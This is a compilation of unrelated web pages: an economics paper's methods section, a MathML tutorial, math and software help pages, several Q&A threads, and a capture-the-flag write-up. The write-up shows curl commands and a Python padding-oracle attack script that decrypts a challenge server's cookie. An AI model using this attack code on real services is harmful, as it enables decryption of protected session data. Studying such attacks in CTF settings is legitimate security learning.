We acknowledge that the direct evidence supporting a DDM-like process under time delay is relatively weak. While we believe that a DDM process is still at work under time delay, the issue is that the true RTs are unobservable. That is, we do not know when subjects actually make their decisions, since they are forced to wait until 10 s have passed before responding. It seems likely that most subjects still do use a DDM, raise their decision thresholds to allow for the extra time, but still finish their decisions well before they are cued to respond. After the cue, they respond at a roughly random time. This is consistent with the roughly Normal RT distribution seen in this condition (Supplementary Fig. 5). It is worth noting though that the biased DDM simulations under time delay do produce similar choice patterns (Supplementary Fig. 10) as seen in the experimental data (Fig. 2b).
The SSM framework also opens the door for more detailed modeling of dual process cognition, building on other implementations of intuition vs. deliberation57,67,68,69,70. Finally, a starting point bias captures the behavioral phenomenon while being agnostic about its source (e.g., genetics, upbringing, experiment instructions, prior decisions, etc.). More research is required to fully characterize the factors that affect these starting points and how they change over time71.
## Methods
### Subjects
In total 102 subjects (56 females) participated in the experiment. Eighteen subjects took part in an initial experiment at The Ohio State University (OSU), followed by 84 subjects at the University of Konstanz. On average, subjects earned 20 dollars at OSU and 16 Euros at Konstanz (including show-up fees). Subjects gave informed written consent before receiving the instructions at OSU, and we obtained informed consent from subjects when they registered for the experiment at Konstanz. OSU’s Human Subjects Internal Review Board approved the experiment.
### Experimental design
The mini-dictator games under different time conditions had the same properties but minor differences in payoffs. Specifically, the differences between the dictators’ payoffs (DicDiff) were 2, 4, 6, 8, and 10, while the differences between the receivers’ payoffs (ReceDiff) were from 3 to 57, in steps of 6. In every trial, the subject had to decide whether to give up some of their own money in order to increase the other subject’s payoff and reduce the inequality between them. We first fixed the payoffs for 50 games in the time-free condition (Games 1–50). We then decreased (increased) all the payoffs by 1 for one half of these games and increased (decreased) them by 1 for the other half to get the 50 games for the time-pressure (-delay) conditions. Finally, we decreased all the payoffs by 2 for one half of the games and increased them by 2 for the other half to get the other 50 time-free trials (Games 51–100).
At the beginning of each session, we randomly matched subjects into two-person groups. We randomized the order of the games within the different time conditions for each group.
### Preference estimation
We employ the inequality aversion model proposed by Fehr and Schmidt2 to estimate subjects’ preferences using maximum likelihood estimation (MLE). A subject’s utility for each option in the mini-dictator game is given by
$$U\left( u_{\mathrm{d}},u_{\mathrm{r}} \right) = u_{\mathrm{d}} - \beta \left( u_{\mathrm{d}} - u_{\mathrm{r}} \right),$$
(1)
where ud is the dictator’s payoff and ur is the receiver’s payoff. The parameter β indicates the subject’s social preference, with higher β indicating stronger pro-sociality.
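As a sketch, Eq. (1) in Python (the example payoffs and β value below are mine, for illustration only):
def fs_utility(u_d, u_r, beta):
    # Eq. (1): dictator's payoff minus beta times the advantageous payoff gap
    return u_d - beta * (u_d - u_r)
# a subject with beta = 0.3 weighing a selfish (10, 2) option against a pro-social (8, 6) one
fs_utility(10, 2, 0.3), fs_utility(8, 6, 0.3)   # (7.6, 7.4): the selfish option wins narrowly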
### Fitting the biased DDM at the group level
We estimated the biased DDM using subjects’ 100 decisions in the time-free condition for selfishly predisposed and pro-socially predisposed subjects separately. We used Fast DM72 with the Kolmogorov-Smirnov method to estimate the model. In the estimation, we let the drift rate (v) depend on the payoffs in each trial. Thus, we estimated a drift rate for each combination of DicDiff and ReceDiff. Since we had 50 different combinations (5 DicDiff and 10 ReceDiff) in our games, this meant 50 drift rates. In the estimation, we also included inter-trial variability of the starting point (szr), but kept szr, the non-decision time (t0), and the threshold (a) constant across games.
### Fitting the DDM at the individual level
We estimated the biased DDM and the unbiased DDM at the individual level using subjects’ 100 decisions in the time-free condition. We used RWiener73 with MLE to estimate the model. In the estimation, we set the drift rate (v) as a linear function of DicDiff and ReceDiff,
$$v = d_{\mathrm{c}} + d_{\mathrm{d}} \ast {\mathrm{DicDiff}} + d_{\mathrm{r}} \ast {\mathrm{ReceDiff}}$$
(2)
Thus, we estimated six parameters in total for the biased DDM: the relative starting point (z), the threshold (a), the non-decision time (t0), the drift constant (dc), the weight on DicDiff (dd), and the weight on ReceDiff (dr). In the unbiased DDM, we fixed the relative starting point at z = 0.5. Supplementary Table 4 and Supplementary Table 7 show the details of the estimation results. The BIC for each estimation is given by
$${\mathrm{BIC = }}\ln \left( n \right)k - 2{\mathrm{ln}}(L),$$
(3)
where n is the number of observations in the data, k is the number of parameters estimated by the model, and L is the likelihood in the MLE estimation.
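Eq. (3) translates directly into code; a small illustrative helper:

```python
import numpy as np

def bic(log_likelihood, n_obs, k_params):
    """Bayesian information criterion, Eq. (3): ln(n)k - 2 ln(L)."""
    return np.log(n_obs) * k_params - 2.0 * log_likelihood
```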
### Nonparametric test
We use Spearman correlation tests whenever looking at the correlation between β and other measures/parameters. The fitting procedure for the Fehr-Schmidt model can produce extreme parameter values for some subjects who (almost) always choose the pro-social or selfish options. For example, some subjects have β of 335 or −217, while the typical range of values is between 0 and 1. For a linear Pearson correlation, this can seriously distort the estimates. The rank-based Spearman correlations allow us to include all subjects, and the resulting correlation is almost the same as the Pearson correlation when we exclude these "outlier" subjects.
### Out-of-sample predictions
To do out-of-sample predictions, we estimated the biased DDM and the unbiased DDM on half of the data in the time-free condition, and then used the estimated parameters to predict subjects' decisions in the other half of the data. Since we did not have enough trials at the individual level, we estimated these models at the group level. Specifically, we estimated the model using Games 1–50 and Games 51–100 separately. Here we again used the Kolmogorov-Smirnov method of Fast-DM [72] (the estimation results are shown in Supplementary Table 8). We used the estimated parameters to simulate the biased DDM and the unbiased DDM 5000 times for each game to determine the predicted probability of the selfish choice in each game.
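A forward simulation of this kind can be sketched as a simple Euler scheme. The boundary coding (upper boundary = selfish) and the omission of the non-decision time t0 (which only shifts response times) are our simplifications:

```python
import numpy as np

def simulate_biased_ddm(v, a, z, dt=0.001, sigma=1.0, max_t=10.0, rng=None):
    """One trial of the biased DDM: evidence starts at relative point z
    (0 < z < 1), drifts at rate v, and stops at boundary 0 or a.
    Returns (choice, decision_time), with choice = 1 at the upper boundary."""
    rng = rng or np.random.default_rng()
    x, t = z * a, 0.0
    while 0.0 < x < a and t < max_t:
        x += v * dt + sigma * np.sqrt(dt) * rng.standard_normal()
        t += dt
    return int(x >= a), t

# predicted P(selfish) for one game, from 5000 simulated trials:
# p = np.mean([simulate_biased_ddm(v, a, z)[0] for _ in range(5000)])
```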
For the logistic model predictions, we regressed the following two logistic models on the same halves of the data (the regression results are shown in Supplementary Table 9),
$${\mathrm{Logit:Selfish = }}\gamma _0 + \gamma _1 \ast {\mathrm{DicDiff}} + \gamma _2 \ast {\mathrm{ReceDiff}} + \varepsilon ,$$
(4)
$$\begin{array}{l}{\mathrm{Logit + RT:Selfish}}\\ {\mathrm{ = }}\gamma _0{\mathrm{ + }}\gamma _1 \ast {\mathrm{DicDiff}}{\mathrm{ + }}\gamma _2 \ast {\mathrm{ReceDiff}}{\mathrm{ + }}\gamma _3 \ast {\rm RT}{\mathrm{ + }}\varepsilon ,\end{array}$$
(5)
and used the results to calculate the predicted probabilities of selfish choices.
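The two regressions translate directly to, e.g., statsmodels. The DataFrame below is a random stand-in, since only the (assumed) column names matter for the sketch:

```python
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

# Illustrative stand-in for the trial-level data (names are assumptions).
rng = np.random.default_rng(0)
df = pd.DataFrame({
    "DicDiff": rng.choice([2, 4, 6, 8, 10], size=500),
    "ReceDiff": rng.choice(np.arange(3, 58, 6), size=500),
    "RT": rng.gamma(2.0, 0.5, size=500),
})
df["Selfish"] = (rng.random(500) < 0.5).astype(int)

logit = smf.logit("Selfish ~ DicDiff + ReceDiff", data=df).fit()          # Eq. (4)
logit_rt = smf.logit("Selfish ~ DicDiff + ReceDiff + RT", data=df).fit()  # Eq. (5)
p_hat = logit_rt.predict(df)  # predicted P(selfish) for each trial
```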
Since the number of selfishly predisposed subjects was different from the number of pro-socially predisposed subjects, we measured the aggregate predictive performance using Cramer's λ [56], which is calculated as
$$\lambda {\mathrm{ = }}\bar P^ + - \bar P^ - ,$$
(6)
where $$\bar P^ +$$ and $$\bar P^ -$$ denote the predicted probability of choosing the selfish option on trials in which the selfish option was actually chosen and on trials in which the pro-social option was actually chosen, respectively. Thus, λ ∈ [0,1] reflects how much of the choice variation across trials is captured by the model. λ = 1 indicates that the model can perfectly predict choice outcomes, while λ = 0 indicates that the model predicts decisions at chance.
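In code, Eq. (6) is a two-line computation (argument names are ours):

```python
import numpy as np

def cramers_lambda(p_selfish_pred, chose_selfish):
    """Cramer's lambda, Eq. (6): mean predicted P(selfish) on trials where
    the selfish option was chosen, minus the mean on pro-social trials."""
    p = np.asarray(p_selfish_pred, dtype=float)
    c = np.asarray(chose_selfish, dtype=bool)
    return p[c].mean() - p[~c].mean()
```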
http://www.maa.org/external_archive/joma/Volume7/Siegrist/BasicMath.xhtml?device=mobile
# A Basic Article with MathML
#### Abstract
This article shows how to combine XHTML for basic exposition and MathML for mathematical expressions. This document can be used as a basic template, along with the files in the list below.
#### Keywords
• XHTML
• MathML
• CSS
• JavaScript
• document object model
• mathematical documents
## 1. Introduction
This is a compound XML document that includes basic exposition in XHTML (the rigorous, XML version of HTML) and MathML (the Mathematics Markup Language) for mathematical expressions. Both of these markup languages are W3C standards, although currently only the Firefox browser supports them in native form. Nonetheless, compound documents like this are the future of mathematics on the web.
Recall that the first part of a compound XML document contains declarations about the types of XML used, the document type definition, and other information. A document with MathML should be saved with the extension xhtml, and should have the following initial declarations:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE math PUBLIC "-//W3C//DTD MathML 2.0//EN"
"http://www.w3.org/Math/DTD/mathml2/mathml2.dtd">
<?xml-stylesheet type="text/xsl" href="mathml.xsl"?>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
You don't really have to understand what all this means, but if you're curious: the first line declares that this is an XML document and gives the version and encoding. The second line declares that this is a compound document with MathML and gives a link to a document type definition (DTD). The third line gives a reference to an XSL style sheet, which is necessary for Content MathML (more about that later), and finally the html tag gives a reference to a namespace.
## 2. MathML
MathML comes in two flavors: Presentation MathML and Content MathML. Both versions encode a great deal about the structure of the mathematical expressions. We do not intend to give a tutorial of MathML in this article (see the resources for that). Rather, we will give a few examples that illustrate what MathML can do.
First, however, you will need to download the MathML style sheets listed in the table of contents and put them in your document directory. The last of these, ctop.xsl, is only needed for Content MathML and hence can be omitted if you are just going to use Presentation MathML.
#### Example 1
The roots of the quadratic equation $ax^{2}+bx+c=0$ are given by
$x=\frac{-b\pm\sqrt{b^{2}-4ac}}{2a}$
The mathematical expressions in this example are written in Presentation MathML. The source code for the second expression is given below. Even though MathML is quite verbose, you can probably figure out what each tag does.
<math xmlns="http://www.w3.org/1998/Math/MathML" display="block">
<mrow>
<mi>x</mi><mo>=</mo>
<mfrac>
<mrow>
<mo>-</mo><mi>b</mi><mo>±</mo>
<msqrt>
<msup>
<mi>b</mi><mn>2</mn>
</msup>
<mo>-</mo>
<mn>4</mn><mo>⁢</mo><mi>a</mi><mo>⁢</mo><mi>c</mi>
</msqrt>
</mrow>
<mrow>
<mn>2</mn><mo>⁢</mo><mi>a</mi>
</mrow>
</mfrac>
</mrow>
</math>
#### Example 2
The following integral is important in the study of normal probability distributions, error functions, and other areas:
$\int_{-\infty}^{\infty} e^{-z^{2}/2}\,dz=\sqrt{2\pi}$
This example is written in Content MathML; the source code is given below. Again, even though the language is verbose, you can probably figure out what each tag does:
<math xmlns="http://www.w3.org/1998/Math/MathML" display="block">
<apply><eq />
<apply><int />
<bvar><ci>z</ci></bvar>
<lowlimit>
<apply><minus />
<infinity />
</apply>
</lowlimit>
<uplimit><infinity /></uplimit>
<apply><exp />
<apply><times />
<apply><minus />
<cn type="rational">1<sep />2</cn>
</apply>
<apply><power />
<ci>z</ci>
<cn>2</cn>
</apply>
</apply>
</apply>
</apply>
<apply><root />
<apply><times />
<cn>2</cn>
<pi />
</apply>
</apply>
</apply>
</math>
https://www.gamedev.net/forums/topic/564775-nurbs-basis-functions/
NURBS basis functions
Hi everyone, I'm having trouble understanding the basis functions required to calculate a NURBS surface. On wikipedia, the calculation is defined here: http://en.wikipedia.org/wiki/NURBS#Construction_of_the_basis_functions_.5B3.5D as:

$N_{i,n} = f_{i,n} N_{i,n-1} + g_{i+1,n} N_{i+1,n-1}$

However, since the calculation of $N_{i,n}$ seemingly involves already knowing $N_{i,n}$, I am confused. It seems like circular logic to me. Could anyone please help me understand the basis function? I understand that $N_{i,n}(u)$ is the value of the basis function for control point i of degree n at parameter value u, but I do not understand the full calculation. I'd really appreciate a hint or explanation of how to do this calculation. Specifically, given i, n and u, how do I calculate $N_{i,n}(u)$?

Best Regards, David
I've no experience with NURBS in general, but no one else has answered, so hopefully just looking at this mathematically will help.
The key point is that the equation is recursive:
$N_{i,n} = f_{i,n} N_{i,n-1} + g_{i+1,n} N_{i+1,n-1}$
$N_{i,n}$ is only dependent on $N_{i,n-1}$ and $N_{i+1,n-1}$
So, since you are given that $N_{j,0}$ is piecewise constant at n=0, you can calculate $N_{j,1}$ from it, then $N_{j,2}$, and so on up to the degree you need.
Page 4 of http://libnurbs.sourceforge.net/nurbsintro.pdf gives a better explanation and more explicit information on what the function N actually is where n=0.
p.s. I am a mathematician by training not a computer scientist so apologies if the explanation is overly mathematical.
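To make the recursion concrete, here is a direct (unoptimized) Python transcription. The exact conventions for the ramp functions f and g and for the degree-0 base case vary between texts, so treat these as assumptions:

```python
def basis(i, n, u, knots):
    """Cox-de Boor recursion for the B-spline basis function N_{i,n}(u).
    `knots` is a non-decreasing knot vector."""
    if n == 0:
        # base case: piecewise constant on the half-open knot interval
        return 1.0 if knots[i] <= u < knots[i + 1] else 0.0
    # f and g are the linear ramps from the recursion; 0/0 terms are
    # defined to be zero, which handles repeated knots
    df = knots[i + n] - knots[i]
    dg = knots[i + n + 1] - knots[i + 1]
    f = (u - knots[i]) / df if df > 0 else 0.0
    g = (knots[i + n + 1] - u) / dg if dg > 0 else 0.0
    return f * basis(i, n - 1, u, knots) + g * basis(i + 1, n - 1, u, knots)

# sanity check: with knots [0, 0, 0, 1, 1, 1] this is the Bernstein basis,
# so basis(0, 2, 0.5, [0, 0, 0, 1, 1, 1]) == (1 - 0.5)**2 == 0.25
```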
Thanks very much - apologies for the late reply.
But that's exactly what I needed - once I understood the function as recursive it was straightforward.
Thanks again :)
David
https://www.maplesoft.com/support/help/maple/view.aspx?path=Statistics%2FStandardError
Statistics - Maple Programming Help
Statistics
StandardError
estimate standard error of a sampling distribution
Calling Sequence
StandardError(S, A, ds_options)
StandardError[N](S, X, rv_options)
Parameters
S - name; statistic
A - data set or Matrix data set
N - positive integer; sample size
X - algebraic; random variable or distribution
ds_options - (optional) equation(s) of the form option=value where option is one of ignore or weights; specify options for computing the standard error for a data set
rv_options - (optional) equation of the form numeric=value; specifies options for computing the standard error for a random variable
Description
• The StandardError function computes the standard error of the sampling distribution of the specified statistic. For example, the standard error of the sample mean of $n$ observations is $\frac{\mathrm{\sigma }}{\sqrt{n}}$, where ${\mathrm{\sigma }}^{2}$ is the variance of the original observations. Standard errors are particularly important in the large class of cases when the sampling distribution can be taken to be normal either exactly or to an adequate degree of approximation. Standard error can be computed either for a particular data set or for a random variable.
• In the data set case the sample size and all the relevant parameters (such as mean, standard deviation, etc.) will be estimated based on the specified data. All computations are performed under the assumption that the underlying sampling distribution is approximately normal.
In the random variable case, N is the sample size.
• The first parameter S is the name of a standard quantity applied to either a data set or random variable, e.g. Statistics[Mean], Statistics[Median], Statistics[Variance]. See Statistics[DescriptiveStatistics] for a complete list of quantities.
• The second parameter can be a data set (e.g., a Vector), a Matrix data set, a distribution (see Statistics[Distribution]), a random variable, or an algebraic expression involving random variables (see Statistics[RandomVariable]).
Computation
• By default, all computations involving random variables are performed symbolically (see option numeric below).
• All computations involving data are performed in floating-point; therefore, all data provided must have type/realcons and all returned solutions are floating-point, even if the problem is specified with exact values.
Data Set Options
The ds_options argument can contain one or more of the options shown below. More information for some options is available in the Statistics[DescriptiveStatistics] help page. All unprocessed options will be passed to the corresponding Statistics[DescriptiveStatistics] command.
• ignore=truefalse -- This option controls how missing data is handled by the StandardError command. Missing items are represented by undefined or Float(undefined). So, if ignore=false and A contains missing data, the StandardError command will return undefined. If ignore=true all missing items in A will be ignored. The default value is false.
• weights=Vector -- Data weights. The number of elements in the weights array must be equal to the number of elements in the original data sample. By default all elements in A are assigned weight $1$.
Random Variable Options
The rv_options argument can contain one or more of the options shown below. More information for some options is available in the Statistics[RandomVariables] help page. All unprocessed options will be passed to the corresponding Statistics[DescriptiveStatistics] command.
• numeric=truefalse -- By default, the standard error is computed using exact arithmetic. To compute the standard error numerically, specify the numeric or numeric = true option.
Examples
> $\mathrm{with}\left(\mathrm{Statistics}\right):$
Find the Standard Error of the mean on a sample drawn from the normal distribution.
> $N≔\mathrm{RandomVariable}\left(\mathrm{Normal}\left(0,1\right)\right):$
> $S≔\mathrm{Sample}\left(N,{10}^{3}\right):$
> ${\mathrm{StandardError}}_{{10}^{3}}\left(\mathrm{Mean},N,\mathrm{numeric}\right)$
${0.03162277660}$ (1)
> $\mathrm{StandardError}\left(\mathrm{Mean},S\right)$
${0.0313121441956369}$ (2)
> $\mathrm{Bootstrap}\left('\mathrm{Mean}',S,\mathrm{replications}={10}^{3},\mathrm{output}=\mathrm{standarderror}\right)$
${0.0296068781774789132}$ (3)
> $\mathrm{Bootstrap}\left('\mathrm{Mean}',N,\mathrm{replications}={10}^{3},\mathrm{output}=\mathrm{standarderror},\mathrm{samplesize}={10}^{3}\right)$
${0.0313950353171498359}$ (4)
> $\mathrm{μ}≔\mathrm{Mean}\left(S\right)$
${\mathrm{\mu }}{≔}{0.0611270855668661}$ (5)
> $\mathrm{σ}≔\mathrm{StandardDeviation}\left(S\right)$
${\mathrm{\sigma }}{≔}{0.990176940818334}$ (6)
> ${\mathrm{StandardError}}_{{10}^{3}}\left(\mathrm{Mean},\mathrm{Normal}\left(\mathrm{μ},\mathrm{σ}\right),\mathrm{numeric}\right)$
${0.0313121441956369}$ (7)
Consider the following Matrix data set.
> $M≔\mathrm{Matrix}\left(\left[\left[3,1130,114694\right],\left[4,1527,127368\right],\left[3,907,88464\right],\left[2,878,96484\right],\left[4,995,128007\right]\right]\right)$
${M}{≔}\left[\begin{array}{ccc}{3}& {1130}& {114694}\\ {4}& {1527}& {127368}\\ {3}& {907}& {88464}\\ {2}& {878}& {96484}\\ {4}& {995}& {128007}\end{array}\right]$ (8)
We compute the standard error of the interquartile range of each of the columns, and the standard error of the second moments of the columns with respect to different origins.
> $\mathrm{StandardError}\left(\mathrm{InterquartileRange},M\right)$
$\left[\begin{array}{ccc}{0.668070576628882}& {188.309251368715}& {15668.6416411933}\end{array}\right]$ (9)
> $\mathrm{StandardError}\left(\mathrm{Moment},M,2,\mathrm{origin}=\left[3,1000,100000\right]\right)$
$\left[\begin{array}{ccc}{0.219089023002066}& {47944.4484082151}& {1.44602293933851}{}{{10}}^{{8}}\end{array}\right]$ (10)
Compatibility
• The A parameter was updated in Maple 16.
http://mathematica.stackexchange.com/questions/44507/about-making-a-fraction-taller
About making a fraction “taller” [duplicate]
I encountered two problems with displaying a formula in text format.
• The variables in the formula are italic; I want to change them to normal.
• The fraction size is too small; I want to make it full size.
Should I edit the stylesheet? What exactly should I do?
marked as duplicate by Kuba, rasher, Artes, m_goldberg, Sjoerd C. de Vries Mar 22 '14 at 12:34
Take a look at: Any way to make my equations look better, more Latex like?. There is a lot of information you may find useful. Or preventing TraditionalForm from getting “squished” – Kuba Mar 22 '14 at 8:16
Well, the closers beat me to an answer not contained in the linked "duplicates", which do not address the issue of italics (traditionally, variables are supposed to be in italics): Edit the stylesheet, choose the style Text, and set these options with the Format > OptionInspector: DefaultInlineFormatType->StandardForm, FractionBoxOptions->{AllowScriptLevelChange->False}. Next, you might want to set the font for "InlineCell" by entering the style name InlineCell and setting its font. (Assuming your text is in a Text cell.) – Michael E2 Mar 22 '14 at 12:52
Give this a try:
Row[{
"1.",
Invisible["space"],
"(a)",
Invisible["space"],
"Find ",
}]
which produces:
and this:
Row[{
"2.",
Invisible["space"],
"(a)",
Invisible["space"],
"Find ",
https://www.coin-or.org/CppAD/Doc/ta_delete_array.htm
Deallocate An Array and Call Destructor for its Elements
Syntax
thread_alloc::delete_array(array)
Purpose
Returns memory corresponding to an array created by create_array to the available memory pool for the current thread.
Type
The type of the elements of the array.
array
The argument array has prototype Type* array. It is a value returned by create_array and not yet deleted. The Type destructor is called for each element in the array.
The current thread must be the same as when create_array returned the value array. There is an exception to this rule: when the current execution mode is sequential (not parallel), the current thread number does not matter.
Delta
The amount of memory inuse will decrease by delta , and the available memory will increase by delta , where delta is the same as for the corresponding call to create_array.
Example
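A minimal usage sketch in C++ (the library's language), assuming the create_array/delete_array interface described above; the header path may differ between CppAD versions:

```cpp
// Sketch only: assumes the thread_alloc interface documented above.
# include <cppad/utility/thread_alloc.hpp>
# include <cassert>

int main(void)
{   using CppAD::thread_alloc;

    size_t size_min = 10;  // number of elements we need
    size_t size_out;       // number of elements actually allocated
    // create_array calls the default constructor for each element
    double* array = thread_alloc::create_array<double>(size_min, size_out);
    assert(size_out >= size_min);

    for(size_t i = 0; i < size_min; ++i)
        array[i] = static_cast<double>(i);

    // calls the destructor for each element and returns the memory to the
    // available pool for the current thread (the delta described above)
    thread_alloc::delete_array(array);
    return 0;
}
```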
https://physics.stackexchange.com/questions/568520/special-relativity-interpretation-of-the-partial-derivate-of-stress-energy-tens
# Special Relativity: Interpretation of the partial derivate of Stress-Energy Tensor
This question is based on Carroll's book Spacetime and Geometry, specifically from page 33 to page 36.
In the upper mentioned section we define the Stress-Energy Tensor as:
The flux of the four momentum $$p^\mu$$ across a surface of constant $$x^\nu$$
Here lies the first problem: canonically the flux of a vector across a surface is a scalar, not a matrix or a tensor. So I don't get this definition at all.
But nevertheless I understand that the Stress-Energy Tensor represents a generalization of the concept of mass and energy, so we can move forward for now. We then get the form of the Stress-Energy Tensor for a perfect fluid: $$T^{\mu\nu}=(\rho+p)U^\mu U^\nu+p\eta^{\mu\nu}$$ (where $$\rho$$ is the energy density, $$p$$ is the pressure and $$U$$ is the four-velocity; keep in mind that we are working in flat spacetime). This is fine for me; however, we then come to the following expression: $$\partial _\mu T^{\mu\nu}=0$$ It is stated that the $$\nu=0$$ component corresponds to the conservation of energy and the other three components correspond to the conservation of momentum, but no direct proof, or justification, of this statement is given. Using the definition of $$T^{\mu\nu}$$ previously cited: how can we show that the above statement is true, or at least plausible?
• I don't understand your comment "canonically the flux of a vector across a surface is scalar...". See en.wikipedia.org/wiki/… and compare to en.wikipedia.org/wiki/Flux#Flux_as_a_surface_integral. Are you mixing the two definitions? For the former, the "scalar" case is a very special case. – Brick Jul 27 '20 at 18:11
• Secondly, this seems like two distinct questions to me. Really you should ask one question at a time, and the second one, at least, probably has an answer somewhere on this site already. – Brick Jul 27 '20 at 18:13
The fundamental tensor equation of the relativistic mechanics of continuous matter is $$K^\nu = \partial_\mu T^{\mu\nu}$$ where $$K^\nu$$ is the 4-force-density acting on the material medium and $$T^{\mu\nu}$$ is the energy-momentum-stress tensor of the system (note that the free index is $$\nu$$; the divergence is taken over $$\mu$$). Consequently, for $$\nu=0$$ we obtain the equation of continuity and for $$\nu=1,2,3$$ the 3-vector equation of motion. Of course, in the absence of external forces ($$K^\nu=0$$), the scalar relation corresponds to conservation of energy and the vector relation becomes the law of conservation of linear momentum.
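To see why this is at least plausible for the perfect fluid above, take the non-relativistic limit $$U^\mu \approx (1, v^i)$$, $$p \ll \rho$$ (with signature $$(-,+,+,+)$$); the following is a sketch of the usual textbook steps, not a full proof. The $$\nu = 0$$ component of $$\partial_\mu T^{\mu\nu} = 0$$ reduces to the continuity equation $$\partial_t \rho + \nabla \cdot (\rho \vec{v}) = 0,$$ which expresses conservation of energy, while the spatial components $$\nu = i$$ reduce to the Euler equation $$\rho\,(\partial_t + \vec{v} \cdot \nabla)\, v^i = -\partial^i p,$$ which expresses conservation of momentum.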
https://grocid.net/2016/05/15/tu-ctf-pet-padding-inc/
# TU CTF – Pet Padding Inc.
A web challenge worth 150 points, with description
We believe a rouge whale stole some data from us and hid it on this website. Can you tell us what it stole?
http://104.196.60.112/
Visiting the site, we see that there is a cookie `youCantDecryptThis`. Alright… lets try to fiddle with it.
We run the following command
`curl -v --cookie "youCantDecryptThis=aaaa" http://104.196.60.112/`
and we observe that there is an error which is not present compared to
when running it with the correct cookie is set, i.e.,
`curl -v --cookie "youCantDecryptThis=0KL1bnXgmJR0tGZ/E++cSDMV1ChIlhHyVGm36/k8UV/3rmgcXq/rLA==" http://104.196.60.112/`
Clearly, this is a padding error (actually, there is an explicit padding error warning, but it is not shown by curl). OK, so decryption can be done by a simple padding oracle attack. This attack is rather simple to implement (basically, use the relation $P_i = D_K(C_i) \oplus C_{i-1}$ and the definition of PKCS#7 padding; see the wikipedia page for a better explanation), but I decided to use PadBuster. The following (modified example) code finds the decryption:
```python
import logging
import socket
import time

import requests
from paddingoracle import BadPaddingException, PaddingOracle


class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        # The original post omits how the modified ciphertext is sent;
        # presumably it is placed in the youCantDecryptThis cookie here.
        while 1:
            try:
                response = self.session.get('http://104.196.60.112',
                        stream=False, timeout=5, verify=False)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...', self.wait)
                time.sleep(self.wait)
                continue
        self.history.append(response)
        # The server leaks an explicit padding error warning on invalid
        # padding; that warning is exactly the oracle we need.
        if 'padding' in response.text.lower():
            raise BadPaddingException


if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
```
The decrypted flag we get is `TUCTF{p4dding_bec4use_5ize_m4tt3rs}`!
https://economics.stackexchange.com/questions?tab=newest&page=3
All Questions
8,813 questions
• Cardinal Voting, Incentive Compatibility and Secrecy - Is there any available/feasible/practical way to make a Cardinal Voting both Incentive Compatible and Secret? A method to make a cardinal voting incentive compatible would be to force them to put ...
• Which market category does this sustainable product belong to? - I'm currently working on an assignment, which is making an export plan for a product aimed at Asia. However I can't define the market of my product. My product is basically an artificial riverbank; ...
• What prevents a government from issuing debt to finance riskier investment? - Germany's government has a 10Y bond yield of -0.336% (http://www.worldgovernmentbonds.com/country/germany/). Meanwhile, Brazil has a 10Y bond yield of 6.415% (http://www.worldgovernmentbonds.com/...
• Economics of Health Textbook Recommendation - Was wondering if anyone who has taught a class on health economics could give some background on which textbook they used for their class and why. It seems like "Healthy Economics" by Bhattacharya, ...
• Negative correlation conditional variance and return - I've estimated a GARCH for the S&P 500, Nikkei and DAX indices. In the model for the return of the S&P 500, the results indicate the return of the DAX has a negative effect on the S&P 500 conditional ...
• Why does Canada have only half the taxes of the UK in the OECD NTCP data? - This data sums taxes with healthcare contributions, private or not, so not surprisingly the US scores high on that measure. But why is Canada so suspiciously low? I mean Canada has less than half (11....
• When everyone sells at an event of a recession, who buys? - I'm trying to walk through and understand the basic events of the great depression. I understand that at one point (Black Thursday) the news of a downfall of stock prices hit investors, so they ...
• Forward Currency Exchange - Could anyone help me understand the forward bid and ask for PLN/RON for the next 3 months. I know: Bid - Ask EUR/RON 4,7261 - 4,7309 CAD/RON 3,2302 - 3,...
• Linking creeping inflation to industrial revolution - The Russian wiki on price revolution says (in translation) that "creeping inflation became the stimulus that in the end led to the industrial revolution" ...
• What is equilibrium dependent upon in Generalized Second-Price Auctions? - Theory states that GSP auctions induce truthful bidding. Is it the case that this is true ONLY IF a) each of the bidders truthfully bids their value ($b_i = v_i$) (each bidder's optimal strategy) ...
• Why can we write any lottery as a convex combination of the degenerate lotteries? - I know that a degenerate lottery is a lottery that yields outcome $n$ with probability $1$ and I also know the definition of convex combination: given $x_{1},x_{2}, \cdots ,x_{n} \in \mathbb{R}$, a ...
• Modeling market growth, without compound interest or regression - I am working on predicting the growth of a certain market. Traditionally, this is done through a simple compound interest model: $$ThisYear'sMarket * (1 + g)^n$$ What would be a better way to ...
• What's the opposite of a Pareto improvement called? - Wikipedia defines a Pareto Improvement, "given a certain initial allocation of goods among a set of individuals", as: a change to a different allocation that makes at least one individual or ...
• What is 'repo' in banking - I keep hearing about the repo rate etc. But this question is not what the repo rate is. It is: what is a definition of 'repo'?
• Question Regarding Equilibrium Price & Surplus - So here's an example of a standard Supply & Demand Relationship for an Individual Supplier: As a supplier, for 1 dollar, I'll produce 1 unit of something. For 2 dollars, I'll produce 2 units, for ...
• How much do the concepts and methodologies of GDP, CPI, PPP overlap? - Indicators of greatest importance in macro-economics are: the gross domestic product (GDP: comparison and growth of wealth), the consumer price index (CPI: inflation rate), purchasing power parity (...
• How to maximize total revenue on a constant elasticity curve - So to maximize total revenue, we sell at the price on the demand elasticity curve where elasticity = 1, right? Let's say on one curve the elasticity throughout the curve is equal to 1.5. How much should ...
• Papers on the rate of returns for government-run pension plans - I'm looking for papers studying the implied rate of return for various government pension programs around the world. Both historical and expected returns. Or any study that looks at the taxes for the ...
• Meaning of Exchange rate - Does the exchange rate of a local currency relative to the US dollar mean LOC/USD or USD/LOC?
• What could be an example of equity-efficiency tradeoff in healthcare, social protection or defense? For environment I did think of pollution permits that can cause geographical differences in ...
• Does quasi-concave utility function imply convex indifference curve? - It is well known that a convex indifference curve (i.e. the function is convex) / preference would imply a quasi-concave utility function. But does a quasi-concave utility function imply a convex indifference ...
• How does definition of "price equilibrium with transfer" also include the case for the definition of "walrasian equilibrium"? - According to MWG and this answer, walrasian equilibrium is a special case of price equilibrium with transfers. However, since wealth distribution is predetermined in walrasian equilibrium, would it ...
• Congruence of GDP as calculated by production and by consumption - Here I've read the following (translated by Google): GDP can be calculated in two ways: firstly, by origin, that is, by estimating the value of all goods and services produced, and secondly by ...
